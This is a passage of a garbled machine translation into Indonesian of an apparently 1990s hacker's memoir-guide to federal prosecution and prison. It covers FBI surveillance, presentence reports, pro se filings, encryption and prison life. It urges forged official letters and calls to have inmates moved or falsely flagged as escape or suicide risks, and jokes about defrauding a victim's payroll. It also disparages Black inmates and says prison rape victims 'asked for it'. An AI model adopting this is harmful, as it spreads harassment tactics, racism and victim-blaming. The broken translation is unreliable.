penyedia layanan atau korban, mereka akan mengambil rute itu. Saya tidak tahu apa yang mereka benci lebih buruk, meminta
bantuan luar atau membuang sumber daya internal yang berharga.
Metode paling sederhana adalah dengan meminta bantuan seorang informan yang akan bersaksi "Saya melihatnya melakukannya
!," lalu mendapatkan
surat perintah untuk menyita barang bukti di komputer Anda. Ba da boom, ba da rusak.
Perangkat lain termasuk register pena yang merupakan perangkat yang mencatat setiap digit yang Anda panggil di ponsel Anda
dan
lama panggilan, baik yang masuk maupun yang keluar. Perusahaan telepon menjaga keamanan mereka
departemen. Mereka dapat menempatkan satu di baris Anda dalam sehari jika mereka merasa Anda menipu mereka. Mereka
tidak melakukannya
membutuhkan perintah pengadilan, tetapi FBI melakukannya.
Jebakan, atau jebakan dan lacak, biasanya adalah metode apa pun yang digunakan perusahaan telepon untuk mencatat setiap
nomor yang memanggil a
nomor tertentu. Ini dapat dilakukan pada level sistem switching atau melalui pencarian basis data penagihan. FBI
memerlukan perintah pengadilan untuk informasi ini juga. Namun, saya pernah mendengar cerita tentang keamanan perusahaan
telekomunikasi
investigasi meneruskan informasi kepada agen. Secara alami itu akan menjadi "kesalahan yang tidak berbahaya"
bertindak dengan itikad baik. "(humor hukum)
Saya ingin memberi tahu Anda lebih banyak tentang penyadapan FBI, tetapi ini sejauh yang saya bisa tanpa pis menyanyikannya.
Segala sesuatu
Saya sudah mengatakan kepada Anda sejauh ini adalah pengetahuan umum. Jadi saya pikir saya akan berhenti di sini. Jika Anda
benar-benar ingin tahu lebih banyak, tangkap
Kevin Poulsen (Dark Dante) di pesta koktail, membelikannya Coke dan dia akan memberi Anda banyak. (humor hacker)
Sebagai penutup bagian ini saya akan mengatakan bahwa sebagian besar pengawasan elektronik didukung dengan setidaknya
paruh waktu
pengawasan fisik. FBI sering pandai mengikuti orang di sekitar. Mereka suka model menengah
Mobil-mobil Amerika, sangat stok, tanpa decals atau stiker bemper. Jika Anda benar-benar ingin tahu apakah Anda di bawah
pengawasan, beli Opto-elektronik Scout atau penghitung frekuensi Xplorer. Sembunyikan itu pada orang Anda, tempelkan
pasang ear plug di telinga Anda (untuk Xplorer) dan bawa ke mana pun Anda pergi. Jika Anda, dia orang yang berbicara tentang
Anda, atau
Anda terus mendengar statis intermiten (ucapan terenkripsi), Anda mungkin memiliki masalah.
M. LAPORAN INVESTIGASI PRESENTENSI ANDA, PSI ATAU PSR
Setelah Anda mengaku bersalah, Anda akan diseret dari ketenangan dan kenyamanan sel penjara Anda untuk bertemu dengan a
Pengawas masa percobaan. Ini sama sekali tidak ada hubungannya dengan mendapatkan masa percobaan. Justru sebaliknya. PO
adalah
diberdayakan oleh pengadilan untuk menyiapkan profil terdakwa yang lengkap dan, secara teori, tidak bias. Segala sesuatu
mulai dari pendidikan, sejarah kriminal, perilaku psikologis, karakteristik pelanggaran dan lebih banyak akan dimasukkan
dalam laporan yang tebal dan mendetail tentang kehidupan Anda. Setiap potongan kecil informasi yang kotor
membuat Anda terlihat seperti penjahat sosiopat, pemujaan setan, dan menjijikkan akan dimasukkan dalam laporan ini.
Mereka akan menaruh beberapa hal negatif di sana juga.
Saran saya sederhana. Berhati-hatilah dengan apa yang Anda katakan kepada mereka. Suruh pengacaramu hadir dan pikirkan
bagaimana
Anda mengatakan dapat digunakan untuk melawan Anda. Ini sebuah contoh:
PO: Ceritakan tentang pendidikan Anda dan apa yang ingin Anda lakukan di waktu luang Anda.

Halaman 65
Tn. Steal: Saya bersiap untuk mendaftar di tahun terakhir kuliah saya. Di waktu luang saya, saya bekerja untuk amal membantu
anak yatim.
PSR kemudian membaca "Tuan Steal tidak pernah menyelesaikan pendidikannya dan bergaul dengan anak-anak kecil di
Indonesia
waktu luangnya. "
Dapatkan fotonya?
J. PENGOLAHAN PRO SE
Pro Se atau Pro Per adalah ketika seorang terdakwa mewakili dirinya sendiri. Seorang pengacara terkenal pernah berkata
"seorang pria yang mewakili
dirinya memiliki orang bodoh untuk seorang klien. "Kata-kata yang lebih benar tidak pernah diucapkan. Namun, saya tidak bisa
menekankan betapa pentingnya hal itu
sepenuhnya memahami sistem peradilan pidana. Bahkan jika Anda memiliki seorang pengacara yang hebat itu baik untuk dapat
mempertahankan
mengawasi dia atau bahkan membantu. Bantuan klien yang berpendidikan bisa sangat bermanfaat bagi pengacara. Mereka
mungkin
pikir Anda sakit di pantat tapi itu hidup Anda. Pegang itu. Apapun, mewakili diri sendiri adalah
umumnya merupakan kesalahan.
Namun, setelah banding Anda, ketika pengacara yang ditunjuk pengadilan Anda kehabisan, atau Anda telah kehabisan
dana, Anda akan dipaksa untuk menangani masalah sendiri. Pada titik ini ada jalan hukum, meskipun cukup
suram, untuk bantuan pasca-hukuman.
Tapi saya ngelantur. Tempat terbaik untuk mulai memahami sistem hukum terletak pada tiga buku murah. Pertama
Federal Hukuman Pedoman ($ 14,00) dan Kode dan Aturan Pidana Federal ($ 20,00) tersedia dari
Penerbitan Barat di 800-328-9 352. Saya menganggap kepemilikan buku-buku ini wajib untuk praperadilan apa pun
tahanan. Yang kedua adalah Jurnal Hukum Georgetown, tersedia di Toko Buku Universitas Georgetown di
Washington DC. Buku ini dijual sekitar $ 40,00 tetapi jika Anda menulis surat kepada mereka dan memberi tahu mereka Anda
Pro Se
berperkara mereka akan mengirimkannya secara gratis. Dan yang tak kalah pentingnya otoritas Pro Se, "The Prisoners Self
Bantu Manual Litigasi "$ 29,95 ISBN 0-379-20831-8. Atau coba http://www.oceanalaw.com/books/n148.htm
O. PENDENGARAN EVIDENTIARY
Jika Anda tidak setuju dengan beberapa informasi yang disajikan dalam laporan kehadiran (PSR) Anda mungkin berhak
ke sidang khusus. Ini dapat berperan dalam menurunkan kalimat Anda atau memperbaiki PSR Anda. Satu
Hal yang penting untuk diketahui adalah bahwa PSR Anda akan mengikuti Anda sepanjang waktu Anda dipenjara. Biro
Penjara menggunakan PSR untuk memutuskan bagaimana menangani Anda. Ini dapat mempengaruhi tingkat keamanan Anda,
rumah singgah Anda,
kelayakan Anda untuk program obat-obatan (yang memberi Anda satu tahun hukuman), dan perawatan medis Anda. Begitu
pastikan PSR Anda akurat sebelum Anda dihukum!
P. MENDAPATKAN PROPERTI ANDA KEMBALI
Dalam sebagian besar kasus, Anda perlu meminta secara resmi pengadilan agar properti Anda dikembalikan. Mereka tidak
akan memanggil Anda dan mengatakan "Apakah Anda ingin Sparc Station ini kembali atau apa?" Tidak, mereka sama saja
segera simpan dan tidak meminta sama baiknya dengan mengatakan kepada mereka bahwa mereka dapat memilikinya.
Anda perlu mengajukan 41 (e) "Mosi Untuk Pengembalian Properti." Kewenangan pengadilan untuk menyimpan barang-barang
Anda tidak
selalu jelas dan harus diambil berdasarkan kasus per kasus. Mereka mungkin tidak peduli dan hakim hanya akan
memesan agar dikembalikan.
Jika Anda tidak tahu cara menulis mosi, cukup kirimkan surat formal kepada hakim yang memintanya kembali. Katakan padanya
kamu
membutuhkannya untuk pekerjaan Anda. Ini sudah cukup, tetapi mungkin ada biaya pengarsipan.
Q. GARANSI LUAR BIASA

Halaman 66
Jika Anda memiliki surat perintah atau biaya yang belum dibayar yang tertunda di yurisdiksi lain, Anda sebaiknya berhadapan
dengan mereka sesegera mungkin -setelah- Anda dihukum. Jika Anda mengikuti prosedur yang benar kemungkinannya
baik waran akan dijatuhkan (digagalkan). Dalam skenario terburuk, Anda akan dipindahkan ke
yurisdiksi yang sesuai, mengaku bersalah dan meminta "waktu Anda berjalan bersamaan." Biasanya dalam kejahatan tanpa
kekerasan
Anda dapat melayani beberapa kalimat sekaligus. Banyak narapidana Federal memiliki waktu menjalankan negara mereka
waktu Federal mereka. Singkatnya: bersamaan adalah baik, buruk berturut-turut.
Prosedur ini disebut sebagai Interstate Agreement On Detainers Act (IADA). Anda juga dapat mengajukan
"Permintaan pengadilan cepat", dengan pengadilan yang sesuai. Ini mulai meter berjalan. Jika mereka tidak mengekstradisi
Anda dalam jangka waktu tertentu, biaya harus dibatalkan. "Litigasi Swadaya Narapidana '
Manual "yang saya sebutkan sebelumnya mencakup topik ini dengan cukup baik.
R. ENKRIPSI
Mungkin ada beberapa dari Anda yang mengatakan, "Saya triple DES mengenkripsi hard drive saya dan 128 karakter RSA
kunci publik untuk keselamatan. "Yah, itu bagus, tapi ... FBI bisa meminta surat panggilan grand jury Anda
kata sandi dan jika Anda tidak memberikannya Anda mungkin didakwa dengan penghalang keadilan. Tentu saja siapa
untuk mengatakan sebaliknya jika Anda lupa kata sandi Anda dalam semua kegembiraan ditangkap. Saya pikir saya mendengar
ini
satu atau dua kali sebelumnya dalam sidang Senat Su-komite. "Senator, saya tidak ingat ingatan
peristiwa yang disebutkan pada saat ini. "Tapi serius, enkripsi yang kuat itu hebat. Namun, itu akan bodoh
mengandalkannya. Jika FBI memiliki komputer Anda dan akses ke perangkat lunak enkripsi Anda sendiri, kemungkinan besar
mereka
bisa mematahkan motivasi. Jika Anda memahami seni melanggar kode yang sebenarnya, Anda harus mengerti
ini. Orang-orang sering mengabaikan fakta bahwa kata sandi Anda, yang Anda gunakan untuk mengakses enkripsi Anda
program, biasanya le ss dari 8 karakter. Dengan menyerang akses ke program enkripsi Anda dengan a
sequencing emulasi keyboard triple DES / 128 bit RSA crypto Anda tidak berharga. Ingat saja, enkripsi
mungkin tidak melindungi Anda.
RINGKASAN HUKUM S.
Sebelum saya pindah ke sub bagian Life in Prison, izinkan saya memberi tahu Anda apa artinya semua ini. Anda akan
mendapatkannya
rusak, kehilangan semua milikmu, tidak keluar dengan jaminan, mengadu musuhmu, bahkan mendapatkan lebih banyak waktu
daripada dirimu
diharapkan dan harus tahan dengan banyak orang idiot di penjara. Kedengarannya menyenangkan? Terus meretas. Dan, jika
memungkinkan,
bekerja pada situs-situs .gov yang sensitif. Dengan begitu mereka bisa menggantungkan spionase rap pada Anda. Itu akan
membawa tentang
12 hingga 18 tahun untuk pelaku pertama kali.
Saya tahu ini semua mungkin terdengar agak suram, tetapi taruhannya untuk peretas telah naik dan Anda perlu tahu apa
mereka. Mari kita lihat beberapa kalimat terakhir:
Agen Mencuri (saya) 41 bulan
Kevin Poulsen 51 bulan
Ancaman Kecil 70 bulan
Kevin Mitnick diperkirakan 7-9 tahun
Seperti yang Anda lihat, FBI memberi waktu sekarang. Jika Anda masih muda, pelaku pertama kali,
tidak canggih (seperti MOD), dan hanya melihat-lihat di beberapa database perusahaan kecil, Anda mungkin mendapatkannya
masa percobaan. Tetapi kemungkinan bahwa jika hanya itu yang Anda lakukan, Anda akan dilewati
penuntutan. Sebagai aturan, FBI tidak akan mengambil kasus kecuali $ 10.000 dalam kerusakan terlibat. Masalahnya adalah
siapa bilang apa kerugiannya? Perusahaan dapat mengatakan angka apa pun yang disukainya dan akan diminta
buktikan sebaliknya. Mereka mungkin memutuskan untuk, untuk tujuan asuransi, menyalahkan sejumlah besar biaya downtime
pada Anda. saya
dapat mendengarnya sekarang, "Ketika kami mendeteksi penyusup, kami segera mengambil sistem kami off-line. Kami butuh
dua minggu
untuk membawanya kembali untuk kehilangan tenaga kerja yang terbuang sebesar $ 2 juta. "Dalam beberapa kasus Anda
mungkin lebih baik saja

Halaman 67
menggunakan sistem penggajian perusahaan untuk memotong Anda beberapa $ 10.000 cek. Dengan cara itu pemerintah memiliki
angka kerugian perusahaan. Ini akan menghasilkan kalimat yang jauh lebih pendek. Saya tidak menganjurkan tindakan kriminal
terang-terangan. saya
anggap saja pedoman hukumannya perlu kerja keras.
BAGIAN II - PENJARA FEDERAL
A. NEGARA v. FEDERAL
Dalam kebanyakan kasus, saya akan mengatakan bahwa melakukan waktu di Penjara Federal lebih baik daripada melakukan
waktu di negara bagian
institusi. Beberapa penjara negara bagian adalah tempat yang sangat kejam dan menyedihkan sehingga perlu dilakukan lebih
banyak waktu
sistem Federal. Namun ini akan berubah. Masyarakat tampaknya berpikir bahwa penjara juga demikian
nyaman dan sebagai hasilnya Kongres telah mengeluarkan beberapa tagihan untuk menguatkan segalanya.
Penjara federal umumnya akan menjadi kurang ramai, lebih bersih, dan lebih santai. Penjara I
Tampak sangat mirip kampus perguruan tinggi dengan banyak rumput dan pohon, bukit-bukit, dan bangunan plesteran. saya
menghabiskan sebagian besar waktuku di perpustakaan bergaul dengan Minor Threat. Kami akan berdebat tentang siapa yang
lebih
elite. "Hukuman saya lebih lama," katanya. "Aku ada di lebih banyak buku dan koran," aku akan membantah.
(Humor) Pengecualian untuk The Fed adalah aturan yang lebih baik adalah negara yang mengizinkan televisi dan pengolah kata
selmu. Ketika saya duduk di sini sesaat sebelum merilis mencorat-coret artikel ini dengan pena dan kertas saya merindukan
bahkan Smith
Corona dengan satu tampilan garis. Negara bagian memiliki berbagai hak istimewa. Anda bisa berakhir di suatu tempat
semuanya dicuri darimu. Ada juga negara-negara yang menghapuskan pembebasan bersyarat, sehingga menghilangkan
kemampuan untuk keluar lebih awal dengan perilaku yang baik. Itulah yang dilakukan FBI.
B. TINGKAT KEAMANAN
Biro Penjara (BOP) memiliki enam tingkat keamanan. Penjara ditugaskan tingkat keamanan dan hanya tahanan
dengan peringkat yang sesuai ditempatkan di sana. Seringkali BOP akan memiliki dua atau tiga fasilitas di satu lokasi.
Namun, mereka pada dasarnya adalah penjara yang terpisah, dibagi oleh pagar.
Fasilitas tingkat terendah disebut minimum, sebuah kamp, atau FPC. Secara umum, Anda akan menemukan pertama kali,
pelaku kekerasan dengan hukuman kurang dari 10 tahun di sana. Kamp tidak memiliki pagar. Tugas kerja Anda di a
kamp biasanya berada di luar lapangan penjara di pangkalan militer terdekat. Kali lain kamp beroperasi sebagai dukungan untuk
penjara terdekat lainnya.
Level selanjutnya adalah Federal Correctional Institution (FCI) yang rendah. Di sinilah Anda menemukan banyak orang
yang seharusnya berada di kamp tetapi karena alasan teknis tidak memenuhi syarat. Ada pagar ganda dengan kawat berduri
mengelilinginya. Sekali lagi Anda akan menemukan sebagian besar tipe tanpa kekerasan di sini. Anda benar-benar harus
mengencingi seseorang
sebelum mereka akan mengambil ayunan pada Anda.
Bergerak ke atas lagi kita sampai ke FCI menengah dan tinggi yang sering digabungkan. Lebih banyak kawat silet, lebih banyak
penjaga,
gerakan terbatas dan kerumunan yang lebih kasar. Itu juga umum untuk menemukan orang dengan kalimat 20 atau 30+ tahun.
Pertempuran jauh lebih umum. Pertahankan diri Anda, bagaimanapun, dan orang-orang umumnya meninggalkan Anda sendirian.
Pembunuhan
tidak terlalu umum. Dengan populasi penjara 1500-2000, sekitar satu atau dua tahun cuti
tandu dan jangan kembali.
Penatentury Amerika Serikat (USP) adalah tempat Anda menemukan para pembunuh, pemerkosa, mata-mata, dan yang paling
kasar
geng bangers. "Leavenworth" dan "Atlanta" adalah yang paling terkenal dari persendian ini. Secara tradisional
dikelilingi oleh dinding bata 40 kaki, mereka memiliki penampilan yang tidak menyenangkan. Tingkat pembunuhan per penjara
rata-rata sekitar 30 per tahun dengan lebih dari 250 penusukan.
Level keamanan tertinggi dalam sistem adalah Max, kadang-kadang disebut sebagai "Supermax." Tahanan tahanan maks
terkunci sepanjang waktu. Email Anda ditunjukkan kepada Anda melalui layar TV di sel Anda. Kamar mandinya menyala
roda dan datang ke pintu Anda. Anda jarang melihat manusia lain dan jika Anda meninggalkan sel Anda, Anda akan menjadi

Halaman 68
diborgol dan memiliki setidaknya tiga pengawal pengawal. Tn. Gotti, bos Mafia, tetap di Supermax. Begitu juga
Aldridge Ames, mata-mata.
C. MENDAPATKAN DESAIN
Setelah Anda dijatuhi hukuman, BOP harus mencari tahu apa yang ingin mereka lakukan dengan Anda. Ada manual yang disebut
"Pedoman Penahanan dan Klasifikasi" yang seharusnya mereka ikuti. Ini tersedia untuk umum melalui
Undang-Undang Kebebasan Informasi dan juga di sebagian besar perpustakaan hukum penjara. Sayangnya, itu bisa diartikan
sejumlah cara berbeda. Akibatnya, sebagian besar pejabat penjara yang bertanggung jawab untuk mengklasifikasikan Anda
melakukan cukup banyak
sesuka mereka.
Klasifikasi pertama Anda dilakukan oleh Perancang Wilayah di BOP Kantor Pusat Regional. Sebagai komputer
peretas Anda kemungkinan besar akan ditempatkan di kamp atau FCI rendah. Ini dengan asumsi Anda tidak menarik pekerjaan
bank
di samping. -Jika Anda benar-benar berakhir di FCI, Anda harus pergi ke kamp setelah enam bulan. Ini asumsi
Anda berperilaku sendiri.
Hal lain yang akan dilakukan oleh Perancang Wilayah adalah menempatkan "Tidak Komputer" pada file Anda. Ini berarti Anda
akan melakukannya
tidak diizinkan mengoperasikan komputer di tempat tugas kerja penjara Anda. Dalam kasus saya, saya tidak diizinkan
dalam jarak 10 kaki satu. Dijelaskan kepada saya bahwa mereka bahkan tidak ingin saya mengetahui jenis-jenis perangkat lunak
mereka berlari. Secara kebetulan, BOP menggunakan LAN berbasis PC / Server dengan NetWare 4.1 berjalan pada Fibre
Koneksi 10baseT Ethernet ke sakelar dan hub Cabletron. Gateway berbasis PC berada di setiap penjara.
Koneksi ke mainframe IBM (Sentry) dilakukan melalui leased lines melalui Frame Relay Sprintnet
layanan dengan 3270 perangkat lunak emulasi / perangkat keras yang ada di server lokal. Sentry tinggal di Washington,
DC dengan penghubung jaringan jenis SNA di kantor regional. ;-) Dan saya mengambil semua ini tanpa
bahkan berusaha. Tak perlu dikatakan, keamanan komputer BOP sangat lemah. Banyak dari mereka tersedia untuk umum
"Pernyataan Program" berisi informasi spesifik tentang cara menggunakan Sentry dan apa yang dirancang untuk dilakukan.
Mereka
memiliki jaringan lain juga, tetapi ini bukan tutorial tentang cara meretas BOP. Saya akan menyimpannya jika mereka pernah
benar-benar membuatku jengkel. (humor)
Tidak mengherankan, BOP sangat paranoid tentang peretas komputer. Saya berusaha keras untuk tidak menjadi seperti itu
tertarik pada sistem mereka atau untuk menerima surat terkait keamanan komputer. Meskipun demikian, mereka mencoba
membatasi
email saya pada banyak kesempatan. Setelah saya mengajukan banyak keluhan dan melakukan pertemuan dengan sipir, mereka
memutuskan saya mungkin akan berperilaku sendiri. 20 atau lebih langganan majalah saya diizinkan untuk datang
di, setelah pemutaran khusus. Terlepas dari semua itu, saya masih memiliki masalah sesekali, biasanya ketika saya terima
sesuatu yang esoteris di alam. Namun, menurut pemahaman saya, banyak peretas di penjara lain belum
telah seberuntung aku.
D. NASIHAT IGNORANT
Anda akan bertemu dengan beberapa orang paling bodoh di planet ini di penjara. Saya kira itu sebabnya mereka ada di sana juga
bodoh melakukan apa pun kecuali kejahatan. Dan untuk beberapa alasan aneh, ini adalah kelas rendah yang tidak berpendidikan
pencuri berpikir mereka pantas dihormati. Bahkan mereka akan sering menuntutnya. Mereka adalah orang yang sama
mengutuk semua orang yang bekerja sama, sementara pada saat yang sama merasa baik-baik saja untuk masuk ke rumah Anda
atau merampok
simpan di bawah todongan senjata. Ini adalah jenis-jenis narapidana yang Anda akan dipenjara, dan kadang-kadang ini
narapidana akan mencoba untuk melupakan Anda. Mereka akan melakukan ini tanpa alasan selain fakta bahwa Anda adalah
tanda yang mudah.
Ada beberapa trik yang bisa dilakukan peretas untuk melindungi diri mereka di penjara. Kunci kesuksesan Anda adalah akting
sebelum masalah meningkat. Penting juga untuk memiliki seseorang di luar (lebih disukai peretas lain) itu
dapat melakukan beberapa rekayasa sosial untuk Anda. Tujuannya hanya untuk memindahkan narapidana Anda
institusi lain. Saya tidak ingin memberikan metode saya tetapi jika staf percaya bahwa seorang narapidana akan melakukannya
menyebabkan masalah, atau jika mereka percaya hidupnya dalam bahaya, mereka akan memindahkannya atau membawanya
pergi dalam segregasi.
Surat-surat rekayasa sosial (tampilan resmi) atau panggilan telepon dari sumber yang tepat ke departemen yang tepat akan
sering membangkitkan tindakan cepat. Ini juga cukup sederhana untuk membuat kehidupan tahanan sangat menyedihkan. Jika
BOP memiliki alasan
untuk menjadi yakin bahwa seorang narapidana adalah risiko pelarian, ancaman bunuh diri, atau tuntutan yang tertunda, mereka
akan menanganinya

Halaman 69
jauh berbeda. Menempel label ini pada narapidana akan menjadi trik yang benar-benar jahat. Saya memiliki pepatah: "Peretas
biasanya memiliki kata terakhir dalam argumen. "Dalam akta.
Kemungkinannya adalah Anda tidak akan memiliki banyak masalah di penjara. Ini terutama berlaku jika Anda pergi ke kamp,
ingatlah
bisnis sendiri, dan jaga mulutmu. Namun demikian, saya sudah membahas semua ini jika Anda menemukan diri Anda sendiri
terperangkap dalam perilaku bodoh para tahanan yang hidupnya berputar di sekitar penjara. Dan satu potong terakhir
saran, jangan membuat ancaman, orang yang benar-benar bodoh terlalu bodoh untuk takut pada apa pun, terutama orang yang
cerdas.
Lakukan saja.
E. PENDUDUK
Distribusi kulit hitam, putih dan Hispanik bervariasi dari satu institusi ke institusi lainnya. Secara keseluruhan itu berhasil
kira-kira 30% putih, 30% Hispanik dan 30% hitam. Sisanya 10% adalah berbagai ras lainnya. Beberapa sendi
memiliki persen kulit hitam yang tinggi dan sebaliknya. Saya tidak harus berprasangka, tapi penjara di mana
Orang kulit hitam yang mayoritas adalah mimpi buruk. Bertindak keras, tidak sopan, dan mencoba menjalankan tempat adalah
hal yang wajar
tentu saja
Dalam hal kejahatan, 60% dari populasi narapidana Federal dipenjara karena kejahatan terkait narkoba. Selanjutnya
paling umum adalah perampokan bank (biasanya untuk uang narkoba cepat), kemudian berbagai kejahatan kerah putih. Itu
Populasi penjara federal telah berubah selama bertahun-tahun. Dulu tempat para elit kriminal. Yang sulit
hukum narkoba telah mengubah semua itu.
Hanya untuk memadamkan gosip, aku akan membahas topik pemerkosaan di penjara. Cukup sederhana, dalam medium dan
rendah
tingkat keamanan Penjara federal tidak pernah terdengar sebelumnya. Di tertinggi itu jarang terjadi. Ketika itu terjadi, satu
dapat berargumen bahwa korban memintanya. Saya mendengar seorang narapidana berkata sekali, "Kamu tidak bisa membuat
narapidana menghisap
ayam yang tidak mau. "Memang. Dalam 41 bulan penahanan saya, saya tidak pernah merasa dalam bahaya. Saya akan
melakukannya
kadang-kadang ada narapidana yang secara halus akan mengajukan pertanyaan kepada saya untuk melihat di mana preferensi
saya berada, tetapi begitu saya
memperjelas bahwa saya tidak mengayun dengan cara itu saya akan dibiarkan sendirian. Sial, aku sering ditabrak ketika aku
masih kecil
nongkrong di Hollywood!
Di sisi lain, penjara negara dapat menjadi lingkungan yang bermusuhan untuk pemerkosaan dan pertempuran secara umum.
Banyak dari kita
mendengar bagaimana Bernie S. dipukuli karena penggunaan telepon. Memang, saya harus sibuk beberapa kali. Paling
argumen penjara terjadi atas tiga hal sederhana: telepon, TV dan uang / narkoba. Jika kamu ingin tinggal
keluar dari masalah di penjara negara bagian, atau Federal dalam hal ini, jangan gunakan telepon terlalu lama, jangan ubah
saluran dan jangan terlibat dalam perjudian atau narkoba. Sejauh pemerkosaan terjadi, pilih teman Anda dengan hati-hati dan
tetap dengan mereka. Dan selalu, selalu, hormat. Bahkan jika pria itu idiot (dan sebagian besar napi),
katakan permisi.
Nasihat etiket penjara saya yang terakhir adalah jangan pernah membawa masalah narapidana Anda ke "orang itu" (penjara
staf). Terlepas dari kenyataan bahwa kebanyakan orang di penjara mengadukan rekan terdakwa mereka di pengadilan, tidak ada
alasan menjadi tikus penjara. Aturan itu ditetapkan oleh para napi sendiri. Jika seseorang keluar dari barisan
kemungkinan akan ada narapidana lain yang akan dengan senang hati memukulnya kembali. Di beberapa penjara narapidana
begitu
takut diberi label tikus yang mereka tolak terlihat berbicara sendirian dengan seorang anggota staf penjara. saya harus
tutup paragraf ini dengan menyatakan bahwa sedikit etiket ini secara rutin diabaikan karena narapidana lain akan mengadu
Anda dengan alasan apa pun. Penjara adalah lingkungan yang aneh.
F. MELAKUKAN WAKTU
Anda dapat membuat apa yang Anda inginkan keluar dari penjara. Beberapa orang duduk-duduk dan melakukan obat bius
sepanjang hari. Lainnya tenggelam
diri mereka dalam rutinitas kerja dan olahraga. Saya belajar teknologi dan musik. Bagaimanapun, penjara tidak
lagi tempat rehabilitasi. Mereka melayani hanya untuk menghukum dan kondisinya hanya akan memburuk. Itu
efeknya adalah bahwa narapidana yang marah, tidak berpendidikan, dan tidak produktif dilepaskan kembali ke masyarakat.
Halaman 70
Ketika saya dipenjara pada tahun 95/96, program band penjara masih beroperasi. Saya bermain drum untuk dua orang
band penjara yang berbeda. Ini sangat membantu menghabiskan waktu dan ketika saya keluar saya akan melanjutkan karir saya
di
musik. Sekarang program itu telah dibatalkan, semua karena beberapa senator ingin dilihat sebagai orang yang tangguh
kejahatan. Tagihan disahkan di Kongres. TV kabel hilang, majalah pornografi tidak lagi diizinkan, dan
tumpukan berat sedang dihapus. Semua ini berarti bahwa tahanan akan memiliki waktu luang mereka
tangan, dan lebih banyak penjaga harus dipekerjakan untuk mengawasi para tahanan. Saya tidak ingin memulai ini
subyek. Pada dasarnya apa yang saya katakan adalah membuat sesuatu dari waktu Anda. Belajar, masuk ke rutinitas dan
sebelumnya
Anda tahu Anda akan pulang, dan orang yang lebih baik di atasnya.
G. TINDAKAN DISIPLIN
Apa yang menyenangkan jika Anda masuk penjara dan tidak melakukan kejahatan? Yah, saya senang mengatakan satu-satunya
"tembakan"
(pelanggaran) yang pernah saya terima adalah karena ada teman yang menelpon dengan tiga cara memanggil saya (Anda tidak
bisa
panggilan semua orang kumpulkan), dan minum anggur buatan sendiri. | -) Penjara sesekali memonitor panggilan telepon Anda
dan pada ketujuh atau delapan ratus kali saya membuat tiga cara saya tertangkap. Hukuman saya sepuluh jam
tugas tambahan (pembersihan). Hukuman lain untuk pemotretan termasuk kehilangan penggunaan ponsel, kehilangan komisaris,
kehilangan
kunjungan, dan dibuang ke dalam lubang. Tembakan juga dapat meningkatkan tingkat keamanan Anda dan dapat membantu
Anda
dipindahkan ke lembaga tingkat yang lebih tinggi. Jika Anda menemukan masalah di area ini, Anda mungkin ingin memilih
up to book, "Bagaimana cara memenangkan sidang disipliner penjara", oleh Alan Parmelee, 206-328-2875.
H. PERBAIKAN ADMINISTRASI
Jika Anda memiliki ketidaksepakatan dengan cara staf menangani kasus Anda (dan Anda akan) atau keluhan lain,
ada prosedur perbaikan administratif. Pertama, Anda harus mencoba menyelesaikannya secara informal. Maka Anda dapat
mengajukan
bentuk BP-9. BP-9 pergi ke kepala penjara. Setelah itu Anda dapat mengajukan BP-10 yang masuk ke wilayah tersebut.
Akhirnya, a
BP-11 pergi ke Kantor Pusat BOP Nasional (Kantor Pusat). Seluruh prosedur adalah lelucon dan perlu waktu
sekitar enam bulan untuk selesai. Tunda dan taklukkan adalah moto BOP. Setelah Anda menyelesaikan proses perbaikan
tanpa hasil, Anda dapat mengajukan tindakan Anda di pengadilan sipil. Dalam beberapa kasus ekstrim, Anda dapat mengambil
kasus Anda secara langsung
ke pengadilan tanpa melelahkan proses pemulihan. Sekali lagi, "Manual Litigasi Bantuan Mandiri Tahanan"
mencakup hal ini dengan baik.
Saran terbaik saya dengan obat omong kosong ini adalah untuk menjaga permintaan Anda singkat, jelas, ringkas dan hanya
meminta satu
hal spesifik per formulir. Biasanya jika Anda "mendapatkannya" Anda akan mendapatkannya. Jika tidak, atau jika BOP dapat
menemukannya
alasan untuk menolak permintaan Anda, mereka akan melakukannya.
Karena alasan ini, saya sering membawa masalah saya ke luar penjara sejak awal. Jika itu cukup substansial
Masalah saya akan memberitahu media, direktur BOP, ketiga pengacara saya, hakim saya dan ACLU.
Seringkali ini berhasil. Itu selalu mengecewakan mereka. Tapi, sayangnya saya seorang pria yang berprinsip dan jika Anda
merampas hak saya
hak saya akan membangkitkan neraka. Di masa lalu saya mungkin menggunakan taktik hacker, seperti mengganggu BOP
seluruh sistem komunikasi membuatnya hancur! Tapi ... Saya sedang direhabilitasi sekarang. Kebetulan, sebagian besar BOP
pejabat dan narapidana tidak memiliki konsep tentang jenis malapetaka yang dapat ditimbulkan oleh seorang hacker pada
kehidupan individu. Jadi sampai
beberapa peretas menunjukkan BOP yang akhirnya Anda harus menerima kenyataan bahwa sebagian besar orang yang Anda
temui
penjara hanya akan menghargai nominal Anda. Hadapilah, Anda tidak berada di dunia maya lagi.
I. RESMI PENJARA
Ada dua jenis, bisu dan bodoh. Saya sudah menghormati beberapa orang, tetapi saya belum pernah bertemu yang terkesan
saya sebagai yang sangat berbakat dengan cara selain mengikuti perintah. Biasanya Anda akan menemukan staf
baik hanya melakukan pekerjaan mereka, atau staf yang bertekad untuk memajukan karir mereka. Yang terakhir mengambil
pekerjaan mereka dan
diri mereka terlalu serius. Mereka tidak mendapatkan apa-apa dengan bersikap baik kepada narapidana sehingga mereka sering
merasa cukup
singkat. Wannabes mantan militer dan penegak hukum adalah hal biasa. Semua dalam semua mereka sakit di pantat tetapi mudah
untuk berurusan dengan. Siapa pun yang pernah turun (dipenjara) untuk sementara waktu tahu yang terbaik adalah tetap rendah
hati.
Jika mereka tidak mengenal Anda dengan nama Anda dalam kondisi baik.

Halaman 71
Salah satu masalah yang akan ditemui peretas komputer dengan staf penjara adalah ketakutan dan / atau kebencian. Jika kamu
adalah anak kulit putih berpendidikan artikulatif sok seperti saya, Anda akan bijaksana untuk bertindak sedikit bodoh. Ini
orang tidak mau menghormati kamu dan beberapa dari mereka akan membenci semua yang kamu perjuangkan. Banyak yang
tidak suka semua
untuk memulai dengan narapidana. Dan konsep Anda suatu hari nanti memiliki pekerjaan yang hebat dan menjadi pengganggu
yang sukses
mereka. Itu semua adalah lingkungan yang agak aneh di mana semua orang tampaknya membenci pekerjaan itu. Saya kira saya
sudah memimpin
hidup terlindung.
Sebelum saya melanjutkan, kadang-kadang akan ada anggota staf tertentu, seperti Case Manager Anda, yang akan memiliki a
sejumlah besar kontrol atas situasi Anda. Cara terbaik untuk berurusan dengan orang tersebut adalah dengan tetap keluar
